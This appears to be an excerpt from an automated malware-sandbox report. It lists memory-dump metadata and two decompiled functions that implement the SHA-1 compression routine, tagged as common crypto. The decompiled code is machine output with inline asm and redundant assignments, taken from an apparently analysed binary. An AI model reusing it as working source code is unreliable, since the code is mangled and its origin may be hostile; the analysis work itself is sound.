                                                          0x0049c04d
                                                          0x0049c04f
                                                          0x0049c088
                                                          0x0049c088
                                                          0x0049c08a
                                                          0x0049c051
                                                          0x0049c051
                                                          0x0049c053
                                                          0x0049c056
                                                          0x0049c058
                                                          0x0049c05a
                                                          0x00000000
                                                          0x0049c05c
                                                          0x0049c05c
                                                          0x0049c05e
                                                          0x0049c060
                                                          0x0049c063
                                                          0x0049c065
                                                          0x0049c067
                                                          0x0049c068
                                                          0x00000000
                                                          0x0049c06a
                                                          0x0049c06a
                                                          0x0049c06c
                                                          0x0049c06e
                                                          0x0049c070
                                                          0x0049c074
                                                          0x0049c074
                                                          0x0049c075
                                                          0x0049c077
                                                          0x0049c07a
                                                          0x0049c07c
                                                          0x0049c07e
                                                          0x0049c080
                                                          0x0049c082
                                                          0x0049c084
                                                          0x0049c087
                                                          0x00000000
                                                          0x0049c087
                                                          0x0049c068
                                                          0x0049c05a
                                                          0x0049c04f
                                                          0x0049c08b
                                                          0x0049c044
                                                          0x00000000
                                                          0x0049c023

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771222270.0000000000492000.00000002.00020000.sdmp, Offset: 00490000, based on PE: true
                                                          • Associated: 00000004.00000002.771208415.0000000000490000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7999a0e9af0101865993698acbcad7474de01a0c429c50a52714c184b6d7de9
                                                          • Instruction ID: 8cdab6b9f8142a3c11f1fe117aa2ce7b0d965cde3f9893bff38a3b5324ad9e20
                                                          • Opcode Fuzzy Hash: e7999a0e9af0101865993698acbcad7474de01a0c429c50a52714c184b6d7de9
                                                          • Instruction Fuzzy Hash: 2E33496140E7C29FCB034BB85DB12E1BFB1AE5722431E49D7C4C08F4A3E219696AD776
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408C4C, Relevance: 1.7, Strings: 1, Instructions: 425COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 72%
                                                          			E00408C4C(void* __eax, void* __edi, intOrPtr* _a4) {
				signed int* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t281;
				signed int* _t282;
				signed int _t283;
				signed int _t289;
				signed int _t292;
				signed int _t296;
				signed int _t299;
				signed int _t303;
				signed int _t307;
				signed int _t309;
				intOrPtr _t315;
				signed int _t323;
				signed int _t325;
				signed int _t328;
				signed int _t330;
				signed int _t339;
				signed int _t345;
				signed int _t346;
				signed int _t351;
				signed int _t359;
				signed int _t363;
				signed int _t364;
				signed int _t368;
				signed int _t371;
				signed int _t375;
				signed int _t376;
				signed int _t405;
				signed int _t410;
				signed int _t416;
				signed int _t419;
				signed int _t426;
				signed int _t429;
				signed int _t438;
				signed int _t440;
				signed int _t443;
				signed int _t451;
				signed int _t467;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t478;
				signed int _t486;
				signed int _t487;
				intOrPtr* _t488;
				signed int* _t491;
				signed int _t498;
				signed int _t501;
				signed int _t506;
				signed int _t509;
				signed int _t512;
				signed int _t515;
				signed int _t516;
				signed int _t520;
				signed int _t532;
				signed int _t535;
				signed int _t542;
				void* _t548;
				void* _t550;

				_push(_t547);
				_t548 = _t550;
				_t491 = _v0;
				_t359 = 0;
				_t3 =  &(_t491[7]); // 0x1b
				_t281 = _t3;
				do {
					 *(_t548 + _t359 * 4 - 0x14c) = ((( *(_t281 - 1) & 0x000000ff) << 0x00000008 |  *_t281 & 0x000000ff) << 0x00000008 | _t281[1] & 0x000000ff) << 0x00000008 | _t281[2] & 0x000000ff;
					 *(_t548 + _t359 * 4 - 0x148) = (((_t281[3] & 0x000000ff) << 0x00000008 | _t281[4] & 0x000000ff) << 0x00000008 | _t281[5] & 0x000000ff) << 0x00000008 | _t281[6] & 0x000000ff;
					 *(_t548 + _t359 * 4 - 0x144) = (((_t281[7] & 0x000000ff) << 0x00000008 | _t281[8] & 0x000000ff) << 0x00000008 | _t281[9] & 0x000000ff) << 0x00000008 | _t281[0xa] & 0x000000ff;
					 *(_t548 + _t359 * 4 - 0x140) = (((_t281[0xb] & 0x000000ff) << 0x00000008 | _t281[0xc] & 0x000000ff) << 0x00000008 | _t281[0xd] & 0x000000ff) << 0x00000008 | _t281[0xe] & 0x000000ff;
					_t359 = _t359 + 4;
					_t281 =  &(_t281[0x10]);
				} while (_t359 < 0x10);
				_t282 =  &_v304;
				_v8 = 0x10;
				do {
					_t405 =  *(_t282 - 0x18);
					_t467 =  *(_t282 - 0x14);
					_t363 =  *(_t282 - 0x20) ^ _t282[5] ^  *_t282 ^ _t405;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t282[9] =  *(_t282 - 0x1c) ^ _t282[6] ^ _t282[1] ^ _t467;
					_t282[8] = _t363;
					_t323 = _t282[7] ^  *(_t282 - 0x10) ^ _t282[2];
					_t282 =  &(_t282[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t47 =  &_v8;
					 *_t47 = _v8 - 1;
					_t282[6] = _t323 ^ _t405;
					_t282[7] =  *(_t282 - 0x1c) ^  *(_t282 - 4) ^ _t363 ^ _t467;
				} while ( *_t47 != 0);
				_t325 =  *_t491;
				_t283 = _t491[1];
				_t364 = _t491[2];
				_t410 = _t491[3];
				_v12 = _t325;
				_v16 = _t491[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t470 = _v8;
					_t498 = _t325 + ( !_t283 & _t410 | _t364 & _t283) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t328 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t410;
					_v12 = _t498;
					asm("rol esi, 0x5");
					_v8 = _t364;
					_t416 = _t498 + ( !_t328 & _t364 | _t283 & _t328) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t501 = _t283;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t368 = _v12;
					_v8 = _t328;
					_t330 = _v8;
					_v12 = _t416;
					asm("rol edx, 0x5");
					_t289 = _t416 + ( !_t368 & _t501 | _t328 & _t368) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t419 = _v12;
					_v16 = _t501;
					asm("ror ecx, 0x2");
					_v8 = _t368;
					_v12 = _t289;
					asm("rol eax, 0x5");
					_v16 = _t330;
					_t506 = _t289 + ( !_t419 & _t330 | _t368 & _t419) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t364 = _v12;
					_t292 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t419;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_v16 = _t292;
					_t283 = _v12;
					_t509 = _t506 + ( !_t364 & _t292 | _t419 & _t364) +  *((intOrPtr*)(_t548 + _t470 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t410 = _v8;
					asm("ror ecx, 0x2");
					_t471 = _t470 + 5;
					_t325 = _t509;
					_v12 = _t325;
					_v8 = _t471;
				} while (_t471 < 0x14);
				_t472 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t410;
					_t512 = _t509 + (_t410 ^ _t364 ^ _t283) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t339 = _v12;
					_v12 = _t512;
					asm("rol esi, 0x5");
					_t426 = _t512 + (_t364 ^ _t283 ^ _t339) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t515 = _t283;
					_v16 = _t364;
					_t371 = _v12;
					_v12 = _t426;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t296 = _t426 + (_t283 ^ _t339 ^ _t371) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t429 = _v12;
					_v8 = _t339;
					_v8 = _t371;
					_v12 = _t296;
					asm("rol eax, 0x5");
					_t472 = _t472 + 5;
					_t364 = _v12;
					asm("ror edx, 0x2");
					_t147 = _t515 + 0x6ed9eba1; // 0x6ed9eb9f
					_t516 = _t296 + (_t339 ^ _v8 ^ _t429) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x154)) + _t147;
					_t299 = _v8;
					_v8 = _t429;
					_v12 = _t516;
					asm("rol esi, 0x5");
					_t410 = _v8;
					_t509 = _t516 + (_t299 ^ _v8 ^ _t364) +  *((intOrPtr*)(_t548 + _t472 * 4 - 0x150)) + _t339 + 0x6ed9eba1;
					_v16 = _t299;
					_t283 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t509;
				} while (_t472 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t410;
					asm("ror eax, 0x2");
					_t520 = ((_t364 | _t283) & _t410 | _t364 & _t283) +  *((intOrPtr*)(_t548 + _v8 * 4 - 0x14c)) + _t509 + _v16 - 0x70e44324;
					_t478 = _v12;
					_v12 = _t520;
					asm("rol esi, 0x5");
					_t345 = _v8;
					asm("ror edi, 0x2");
					_t438 = ((_t283 | _t478) & _t364 | _t283 & _t478) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x148)) + _t520 + _v16 - 0x70e44324;
					_v16 = _t364;
					_t375 = _v12;
					_v12 = _t438;
					asm("rol edx, 0x5");
					_v8 = _t283;
					_t440 = ((_t478 | _t375) & _t283 | _t478 & _t375) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x144)) + _t438 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t303 = _v12;
					_v8 = _t478;
					_v12 = _t440;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t532 = ((_t375 | _t303) & _t478 | _t375 & _t303) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x140)) + _t440 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t443 = _t375;
					_t364 = _v12;
					_v8 = _t443;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t509 = ((_t303 | _t364) & _t443 | _t303 & _t364) +  *((intOrPtr*)(_t548 + _t345 * 4 - 0x13c)) + _t532 + _v16 - 0x70e44324;
					_t410 = _t303;
					_t283 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t509;
					_t346 = _t345 + 5;
					_v8 = _t346;
				} while (_t346 < 0x3c);
				_t486 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t487 = _v8;
					asm("ror eax, 0x2");
					_t535 = (_t410 ^ _t364 ^ _t283) +  *((intOrPtr*)(_t548 + _t486 * 4 - 0x14c)) + _t509 + _v16 - 0x359d3e2a;
					_t351 = _v12;
					_v16 = _t410;
					_v12 = _t535;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t451 = (_t364 ^ _t283 ^ _t351) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x148)) + _t535 + _v16 - 0x359d3e2a;
					_v16 = _t364;
					_t376 = _v12;
					_v12 = _t451;
					asm("rol edx, 0x5");
					_v16 = _t283;
					asm("ror ecx, 0x2");
					_t307 = (_t283 ^ _t351 ^ _t376) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x144)) + _t451 + _v16 - 0x359d3e2a;
					_t410 = _v12;
					_v12 = _t307;
					asm("rol eax, 0x5");
					_v16 = _t351;
					_t542 = (_t351 ^ _t376 ^ _t410) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x140)) + _t307 + _v16 - 0x359d3e2a;
					_t309 = _t376;
					_v8 = _t351;
					asm("ror edx, 0x2");
					_v8 = _t376;
					_t364 = _v12;
					_v12 = _t542;
					asm("rol esi, 0x5");
					_t486 = _t487 + 5;
					_t509 = (_t309 ^ _t410 ^ _t364) +  *((intOrPtr*)(_t548 + _t487 * 4 - 0x13c)) + _t542 + _v16 - 0x359d3e2a;
					_v16 = _t309;
					_t283 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t410;
					_v12 = _t509;
					_v8 = _t486;
				} while (_t486 < 0x50);
				_t488 = _a4;
				 *((intOrPtr*)(_t488 + 8)) =  *((intOrPtr*)(_t488 + 8)) + _t364;
				 *((intOrPtr*)(_t488 + 0xc)) =  *((intOrPtr*)(_t488 + 0xc)) + _t410;
				_t315 =  *((intOrPtr*)(_t488 + 0x10)) + _v16;
				 *_t488 =  *_t488 + _t509;
				 *((intOrPtr*)(_t488 + 4)) =  *((intOrPtr*)(_t488 + 4)) + _t283;
				 *((intOrPtr*)(_t488 + 0x10)) = _t315;
				 *((intOrPtr*)(_t488 + 0x5c)) = 0;
				return _t315;
			}


































































                                                          0x00408c50
                                                          0x00408c51
                                                          0x00408c5b
                                                          0x00408c5f
                                                          0x00408c61
                                                          0x00408c61
                                                          0x00408c64
                                                          0x00408c86
                                                          0x00408cac
                                                          0x00408cd2
                                                          0x00408cf4
                                                          0x00408cfb
                                                          0x00408cfe
                                                          0x00408d01
                                                          0x00408d0a
                                                          0x00408d10
                                                          0x00408d17
                                                          0x00408d28
                                                          0x00408d2b
                                                          0x00408d2e
                                                          0x00408d32
                                                          0x00408d34
                                                          0x00408d36
                                                          0x00408d3f
                                                          0x00408d42
                                                          0x00408d45
                                                          0x00408d50
                                                          0x00408d56
                                                          0x00408d58
                                                          0x00408d58
                                                          0x00408d5b
                                                          0x00408d5e
                                                          0x00408d5e
                                                          0x00408d63
                                                          0x00408d65
                                                          0x00408d68
                                                          0x00408d6b
                                                          0x00408d71
                                                          0x00408d74
                                                          0x00408d77
                                                          0x00408d80
                                                          0x00408d86
                                                          0x00408d8f
                                                          0x00408d9e
                                                          0x00408da5
                                                          0x00408da8
                                                          0x00408dab
                                                          0x00408db4
                                                          0x00408db7
                                                          0x00408dba
                                                          0x00408dd2
                                                          0x00408dd9
                                                          0x00408ddb
                                                          0x00408dde
                                                          0x00408de1
                                                          0x00408dea
                                                          0x00408df1
                                                          0x00408df4
                                                          0x00408df7
                                                          0x00408e06
                                                          0x00408e0d
                                                          0x00408e10
                                                          0x00408e13
                                                          0x00408e1c
                                                          0x00408e26
                                                          0x00408e29
                                                          0x00408e35
                                                          0x00408e38
                                                          0x00408e3f
                                                          0x00408e42
                                                          0x00408e45
                                                          0x00408e4a
                                                          0x00408e4d
                                                          0x00408e56
                                                          0x00408e67
                                                          0x00408e6a
                                                          0x00408e6d
                                                          0x00408e74
                                                          0x00408e77
                                                          0x00408e7a
                                                          0x00408e7d
                                                          0x00408e7f
                                                          0x00408e82
                                                          0x00408e85
                                                          0x00408e8e
                                                          0x00408e93
                                                          0x00408e93
                                                          0x00408ea8
                                                          0x00408eab
                                                          0x00408eae
                                                          0x00408eb5
                                                          0x00408eb8
                                                          0x00408ebb
                                                          0x00408ed0
                                                          0x00408ed7
                                                          0x00408eda
                                                          0x00408ede
                                                          0x00408ee1
                                                          0x00408ee6
                                                          0x00408ee9
                                                          0x00408ef8
                                                          0x00408efb
                                                          0x00408f02
                                                          0x00408f05
                                                          0x00408f08
                                                          0x00408f0b
                                                          0x00408f0e
                                                          0x00408f16
                                                          0x00408f24
                                                          0x00408f27
                                                          0x00408f2a
                                                          0x00408f2a
                                                          0x00408f31
                                                          0x00408f34
                                                          0x00408f37
                                                          0x00408f3f
                                                          0x00408f4d
                                                          0x00408f50
                                                          0x00408f57
                                                          0x00408f5a
                                                          0x00408f5d
                                                          0x00408f60
                                                          0x00408f63
                                                          0x00408f6c
                                                          0x00408f73
                                                          0x00408f73
                                                          0x00408f79
                                                          0x00408f92
                                                          0x00408f95
                                                          0x00408f9c
                                                          0x00408f9f
                                                          0x00408fa2
                                                          0x00408fb4
                                                          0x00408fbe
                                                          0x00408fc1
                                                          0x00408fca
                                                          0x00408fcd
                                                          0x00408fd4
                                                          0x00408fd7
                                                          0x00408fdd
                                                          0x00408ff0
                                                          0x00408ff7
                                                          0x00408ffa
                                                          0x00408ffd
                                                          0x00409000
                                                          0x00409009
                                                          0x0040900c
                                                          0x0040901f
                                                          0x00409022
                                                          0x0040902c
                                                          0x0040902f
                                                          0x00409031
                                                          0x0040903a
                                                          0x0040903d
                                                          0x00409050
                                                          0x00409056
                                                          0x00409059
                                                          0x00409060
                                                          0x00409062
                                                          0x00409065
                                                          0x00409068
                                                          0x0040906b
                                                          0x0040906e
                                                          0x00409071
                                                          0x0040907a
                                                          0x0040907f
                                                          0x00409082
                                                          0x00409082
                                                          0x00409095
                                                          0x00409098
                                                          0x0040909b
                                                          0x004090a2
                                                          0x004090a5
                                                          0x004090a8
                                                          0x004090ab
                                                          0x004090be
                                                          0x004090c1
                                                          0x004090cc
                                                          0x004090cf
                                                          0x004090db
                                                          0x004090de
                                                          0x004090e4
                                                          0x004090e7
                                                          0x004090ea
                                                          0x004090f1
                                                          0x00409101
                                                          0x00409104
                                                          0x0040910a
                                                          0x0040910d
                                                          0x00409114
                                                          0x00409116
                                                          0x00409119
                                                          0x0040911c
                                                          0x0040911f
                                                          0x00409122
                                                          0x00409129
                                                          0x00409138
                                                          0x0040913b
                                                          0x00409142
                                                          0x00409145
                                                          0x00409148
                                                          0x0040914b
                                                          0x0040914e
                                                          0x00409151
                                                          0x00409154
                                                          0x0040915d
                                                          0x0040916e
                                                          0x00409176
                                                          0x0040917c
                                                          0x0040917f
                                                          0x00409181
                                                          0x00409184
                                                          0x00409187
                                                          0x00409194

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 4ca9b537cf5151bf5105a7d62a94a65faf0da40acdf490fd7f2c7f19d4e28317
                                                          • Instruction ID: 6aa63eb68ac8a70590c643f2dc201163e9cc24b627b74998ec7cd251644a2a6c
                                                          • Opcode Fuzzy Hash: 4ca9b537cf5151bf5105a7d62a94a65faf0da40acdf490fd7f2c7f19d4e28317
                                                          • Instruction Fuzzy Hash: C2022DB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408C50, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 73%
                                                          			E00408C50(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}
































































                                                          0x00408c5b
                                                          0x00408c5f
                                                          0x00408c61
                                                          0x00408c61
                                                          0x00408c64
                                                          0x00408c86
                                                          0x00408cac
                                                          0x00408cd2
                                                          0x00408cf4
                                                          0x00408cfb
                                                          0x00408cfe
                                                          0x00408d01
                                                          0x00408d0a
                                                          0x00408d10
                                                          0x00408d17
                                                          0x00408d28
                                                          0x00408d2b
                                                          0x00408d2e
                                                          0x00408d32
                                                          0x00408d34
                                                          0x00408d36
                                                          0x00408d3f
                                                          0x00408d42
                                                          0x00408d45
                                                          0x00408d50
                                                          0x00408d56
                                                          0x00408d58
                                                          0x00408d58
                                                          0x00408d5b
                                                          0x00408d5e
                                                          0x00408d5e
                                                          0x00408d63
                                                          0x00408d65
                                                          0x00408d68
                                                          0x00408d6b
                                                          0x00408d71
                                                          0x00408d74
                                                          0x00408d77
                                                          0x00408d80
                                                          0x00408d86
                                                          0x00408d8f
